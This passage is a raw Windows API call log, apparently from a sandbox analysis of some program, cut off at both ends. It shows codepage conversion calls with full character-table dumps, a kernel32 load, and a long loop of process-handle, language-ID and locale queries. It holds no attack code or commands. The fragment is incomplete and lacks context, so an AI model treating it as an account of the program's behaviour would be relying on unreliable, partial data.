¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ5Ý\x8fú\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0100.582] GetLastError () returned 0x0 [0100.582] SetLastError (dwErrCode=0x0) [0100.582] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0100.582] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ椯跕ᨤJĀ") returned 256 [0100.582] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ椯跕ᨤJĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0100.582] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ椯跕ᨤJĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0100.582] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ5Ý\x8fú\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0100.582] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e57b) returned 0x0 [0100.583] RtlSizeHeap (HeapHandle=0x4020000, Flags=0x0, MemoryPointer=0x4022b70) returned 0x80 [0100.583] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x752b0000 [0100.583] GetCurrentProcess () returned 0xffffffff [0100.583] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.583] GetSystemDefaultLangID () returned 0x26a0409 [0100.583] GetThreadLocale () returned 0x409 [0100.583] GetCurrentProcess () returned 0xffffffff [0100.584] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.584] GetSystemDefaultLangID () returned 0x26a0409 [0100.584] GetThreadLocale () returned 0x409 [0100.584] GetCurrentProcess () returned 0xffffffff [0100.584] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.584] GetSystemDefaultLangID () returned 0x26a0409 [0100.584] GetThreadLocale () returned 0x409 [0100.584] GetCurrentProcess () returned 0xffffffff [0100.584] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.584] GetSystemDefaultLangID () returned 0x26a0409 [0100.584] GetThreadLocale () returned 0x409 [0100.584] GetCurrentProcess () returned 0xffffffff [0100.584] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.584] GetSystemDefaultLangID () returned 0x26a0409 [0100.584] GetThreadLocale () returned 0x409 [0100.584] GetCurrentProcess () returned 0xffffffff [0100.584] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.584] GetSystemDefaultLangID () returned 0x26a0409 [0100.584] GetThreadLocale () returned 0x409 [0100.584] GetCurrentProcess () returned 0xffffffff [0100.584] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.584] GetSystemDefaultLangID () returned 0x26a0409 [0100.584] GetThreadLocale () returned 0x409 [0100.584] GetCurrentProcess () returned 0xffffffff [0100.584] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.584] GetSystemDefaultLangID () returned 0x26a0409 [0100.584] GetThreadLocale () returned 0x409 [0100.584] GetCurrentProcess () returned 0xffffffff [0100.585] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.585] GetSystemDefaultLangID () returned 0x26a0409 [0100.585] GetThreadLocale () returned 0x409 [0100.585] GetCurrentProcess () returned 0xffffffff [0100.585] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.585] GetSystemDefaultLangID () returned 0x26a0409 [0100.585] GetThreadLocale () returned 0x409 [0100.585] GetCurrentProcess () returned 0xffffffff [0100.585] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.585] GetSystemDefaultLangID () returned 0x26a0409 [0100.585] GetThreadLocale () returned 0x409 [0100.585] GetCurrentProcess () returned 0xffffffff [0100.585] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.585] GetSystemDefaultLangID () returned 0x26a0409 [0100.585] GetThreadLocale () returned 0x409 [0100.585] GetCurrentProcess () returned 0xffffffff [0100.585] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.585] GetSystemDefaultLangID () returned 0x26a0409 [0100.585] GetThreadLocale () returned 0x409 [0100.585] GetCurrentProcess () returned 0xffffffff [0100.585] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.585] GetSystemDefaultLangID () returned 0x26a0409 [0100.585] GetThreadLocale () returned 0x409 [0100.585] GetCurrentProcess () returned 0xffffffff [0100.585] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.585] GetSystemDefaultLangID () returned 0x26a0409 [0100.585] GetThreadLocale () returned 0x409 [0100.585] GetCurrentProcess () returned 0xffffffff [0100.586] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.586] GetSystemDefaultLangID () returned 0x26a0409 [0100.586] GetThreadLocale () returned 0x409 [0100.586] GetCurrentProcess () returned 0xffffffff [0100.586] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.586] GetSystemDefaultLangID () returned 0x26a0409 [0100.586] GetThreadLocale () returned 0x409 [0100.586] GetCurrentProcess () returned 0xffffffff [0100.586] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.586] GetSystemDefaultLangID () returned 0x26a0409 [0100.586] GetThreadLocale () returned 0x409 [0100.586] GetCurrentProcess () returned 0xffffffff [0100.586] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.586] GetSystemDefaultLangID () returned 0x26a0409 [0100.586] GetThreadLocale () returned 0x409 [0100.586] GetCurrentProcess () returned 0xffffffff [0100.586] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.586] GetSystemDefaultLangID () returned 0x26a0409 [0100.586] GetThreadLocale () returned 0x409 [0100.586] GetCurrentProcess () returned 0xffffffff [0100.586] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.586] GetSystemDefaultLangID () returned 0x26a0409 [0100.586] GetThreadLocale () returned 0x409 [0100.586] GetCurrentProcess () returned 0xffffffff [0100.586] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.587] GetSystemDefaultLangID () returned 0x26a0409 [0100.587] GetThreadLocale () returned 0x409 [0100.587] GetCurrentProcess () returned 0xffffffff [0100.587] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.587] GetSystemDefaultLangID () returned 0x26a0409 [0100.587] GetThreadLocale () returned 0x409 [0100.587] GetCurrentProcess () returned 0xffffffff [0100.587] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.587] GetSystemDefaultLangID () returned 0x26a0409 [0100.587] GetThreadLocale () returned 0x409 [0100.587] GetCurrentProcess () returned 0xffffffff [0100.587] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.587] GetSystemDefaultLangID () returned 0x26a0409 [0100.587] GetThreadLocale () returned 0x409 [0100.587] GetCurrentProcess () returned 0xffffffff [0100.587] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.587] GetSystemDefaultLangID () returned 0x26a0409 [0100.587] GetThreadLocale () returned 0x409 [0100.587] GetCurrentProcess () returned 0xffffffff [0100.587] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.587] GetSystemDefaultLangID () returned 0x26a0409 [0100.588] GetThreadLocale () returned 0x409 [0100.588] GetCurrentProcess () returned 0xffffffff [0100.588] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.588] GetSystemDefaultLangID () returned 0x26a0409 [0100.588] GetThreadLocale () returned 0x409 [0100.588] GetCurrentProcess () returned 0xffffffff [0100.588] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.588] GetSystemDefaultLangID () returned 0x26a0409 [0100.588] GetThreadLocale () returned 0x409 [0100.588] GetCurrentProcess () returned 0xffffffff [0100.588] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.588] GetSystemDefaultLangID () returned 0x26a0409 [0100.588] GetThreadLocale () returned 0x409 [0100.588] GetCurrentProcess () returned 0xffffffff [0100.588] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.588] GetSystemDefaultLangID () returned 0x26a0409 [0100.588] GetThreadLocale () returned 0x409 [0100.588] GetCurrentProcess () returned 0xffffffff [0100.588] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.588] GetSystemDefaultLangID () returned 0x26a0409 [0100.588] GetThreadLocale () returned 0x409 [0100.588] GetCurrentProcess () returned 0xffffffff [0100.588] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.588] GetSystemDefaultLangID () returned 0x26a0409 [0100.588] GetThreadLocale () returned 0x409 [0100.588] GetCurrentProcess () returned 0xffffffff [0100.588] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.589] GetSystemDefaultLangID () returned 0x26a0409 [0100.589] GetThreadLocale () returned 0x409 [0100.589] GetCurrentProcess () returned 0xffffffff [0100.589] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.589] GetSystemDefaultLangID () returned 0x26a0409 [0100.589] GetThreadLocale () returned 0x409 [0100.589] GetCurrentProcess () returned 0xffffffff [0100.589] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.589] GetSystemDefaultLangID () returned 0x26a0409 [0100.589] GetThreadLocale () returned 0x409 [0100.589] GetCurrentProcess () returned 0xffffffff [0100.589] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.589] GetSystemDefaultLangID () returned 0x26a0409 [0100.589] GetThreadLocale () returned 0x409 [0100.589] GetCurrentProcess () returned 0xffffffff [0100.589] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.589] GetSystemDefaultLangID () returned 0x26a0409 [0100.589] GetThreadLocale () returned 0x409 [0100.589] GetCurrentProcess () returned 0xffffffff [0100.589] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.589] GetSystemDefaultLangID () returned 0x26a0409 [0100.589] GetThreadLocale () returned 0x409 [0100.589] GetCurrentProcess () returned 0xffffffff [0100.589] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.589] GetSystemDefaultLangID () returned 0x26a0409 [0100.589] GetThreadLocale () returned 0x409 [0100.589] GetCurrentProcess () returned 0xffffffff [0100.589] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.590] GetSystemDefaultLangID () returned 0x26a0409 [0100.590] GetThreadLocale () returned 0x409 [0100.590] GetCurrentProcess () returned 0xffffffff [0100.590] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.590] GetSystemDefaultLangID () returned 0x26a0409 [0100.590] GetThreadLocale () returned 0x409 [0100.590] GetCurrentProcess () returned 0xffffffff [0100.590] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.590] GetSystemDefaultLangID () returned 0x26a0409 [0100.590] GetThreadLocale () returned 0x409 [0100.590] GetCurrentProcess () returned 0xffffffff [0100.590] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.590] GetSystemDefaultLangID () returned 0x26a0409 [0100.590] GetThreadLocale () returned 0x409 [0100.590] GetCurrentProcess () returned 0xffffffff [0100.590] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.590] GetSystemDefaultLangID () returned 0x26a0409 [0100.590] GetThreadLocale () returned 0x409 [0100.590] GetCurrentProcess () returned 0xffffffff [0100.590] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.590] GetSystemDefaultLangID () returned 0x26a0409 [0100.590] GetThreadLocale () returned 0x409 [0100.590] GetCurrentProcess () returned 0xffffffff [0100.590] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.590] GetSystemDefaultLangID () returned 0x26a0409 [0100.590] GetThreadLocale () returned 0x409 [0100.590] GetCurrentProcess () returned 0xffffffff [0100.591] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.591] GetSystemDefaultLangID () returned 0x26a0409 [0100.591] GetThreadLocale () returned 0x409 [0100.591] GetCurrentProcess () returned 0xffffffff [0100.591] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.591] GetSystemDefaultLangID () returned 0x26a0409 [0100.591] GetThreadLocale () returned 0x409 [0100.591] GetCurrentProcess () returned 0xffffffff [0100.591] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.591] GetSystemDefaultLangID () returned 0x26a0409 [0100.591] GetThreadLocale () returned 0x409 [0100.591] GetCurrentProcess () returned 0xffffffff [0100.591] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.591] GetSystemDefaultLangID () returned 0x26a0409 [0100.591] GetThreadLocale () returned 0x409 [0100.591] GetCurrentProcess () returned 0xffffffff [0100.591] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.591] GetSystemDefaultLangID () returned 0x26a0409 [0100.591] GetThreadLocale () returned 0x409 [0100.591] GetCurrentProcess () returned 0xffffffff [0100.591] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.591] GetSystemDefaultLangID () returned 0x26a0409 [0100.591] GetThreadLocale () returned 0x409 [0100.591] GetCurrentProcess () returned 0xffffffff [0100.591] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.592] GetSystemDefaultLangID () returned 0x26a0409 [0100.592] GetThreadLocale () returned 0x409 [0100.592] GetCurrentProcess () returned 0xffffffff [0100.592] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.592] GetSystemDefaultLangID () returned 0x26a0409 [0100.592] GetThreadLocale () returned 0x409 [0100.592] GetCurrentProcess () returned 0xffffffff [0100.592] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.592] GetSystemDefaultLangID () returned 0x26a0409 [0100.592] GetThreadLocale () returned 0x409 [0100.592] GetCurrentProcess () returned 0xffffffff [0100.592] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.592] GetSystemDefaultLangID () returned 0x26a0409 [0100.592] GetThreadLocale () returned 0x409 [0100.592] GetCurrentProcess () returned 0xffffffff [0100.592] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.592] GetSystemDefaultLangID () returned 0x26a0409 [0100.592] GetThreadLocale () returned 0x409 [0100.592] GetCurrentProcess () returned 0xffffffff [0100.592] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.592] GetSystemDefaultLangID () returned 0x26a0409 [0100.592] GetThreadLocale () returned 0x409 [0100.592] GetCurrentProcess () returned 0xffffffff [0100.592] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.592] GetSystemDefaultLangID () returned 0x26a0409 [0100.592] GetThreadLocale () returned 0x409 [0100.592] GetCurrentProcess () returned 0xffffffff [0100.592] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.593] GetSystemDefaultLangID () returned 0x26a0409 [0100.593] GetThreadLocale () returned 0x409 [0100.593] GetCurrentProcess () returned 0xffffffff [0100.593] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.593] GetSystemDefaultLangID () returned 0x26a0409 [0100.593] GetThreadLocale () returned 0x409 [0100.593] GetCurrentProcess () returned 0xffffffff [0100.593] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.593] GetSystemDefaultLangID () returned 0x26a0409 [0100.593] GetThreadLocale () returned 0x409 [0100.593] GetCurrentProcess () returned 0xffffffff [0100.593] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.593] GetSystemDefaultLangID () returned 0x26a0409 [0100.593] GetThreadLocale () returned 0x409 [0100.593] GetCurrentProcess () returned 0xffffffff [0100.593] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.593] GetSystemDefaultLangID () returned 0x26a0409 [0100.593] GetThreadLocale () returned 0x409 [0100.593] GetCurrentProcess () returned 0xffffffff [0100.593] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.593] GetSystemDefaultLangID () returned 0x26a0409 [0100.593] GetThreadLocale () returned 0x409 [0100.593] GetCurrentProcess () returned 0xffffffff [0100.593] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.593] GetSystemDefaultLangID () returned 0x26a0409 [0100.593] GetThreadLocale () returned 0x409 [0100.593] GetCurrentProcess () returned 0xffffffff [0100.593] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.594] GetSystemDefaultLangID () returned 0x26a0409 [0100.594] GetThreadLocale () returned 0x409 [0100.594] GetCurrentProcess () returned 0xffffffff [0100.594] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.594] GetSystemDefaultLangID () returned 0x26a0409 [0100.594] GetThreadLocale () returned 0x409 [0100.594] GetCurrentProcess () returned 0xffffffff [0100.594] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.594] GetSystemDefaultLangID () returned 0x26a0409 [0100.594] GetThreadLocale () returned 0x409 [0100.594] GetCurrentProcess () returned 0xffffffff [0100.594] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.594] GetSystemDefaultLangID () returned 0x26a0409 [0100.594] GetThreadLocale () returned 0x409 [0100.594] GetCurrentProcess () returned 0xffffffff [0100.594] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.594] GetSystemDefaultLangID () returned 0x26a0409 [0100.594] GetThreadLocale () returned 0x409 [0100.594] GetCurrentProcess () returned 0xffffffff [0100.594] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.594] GetSystemDefaultLangID () returned 0x26a0409 [0100.594] GetThreadLocale () returned 0x409 [0100.594] GetCurrentProcess () returned 0xffffffff [0100.594] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.595] GetSystemDefaultLangID () returned 0x26a0409 [0100.595] GetThreadLocale () returned 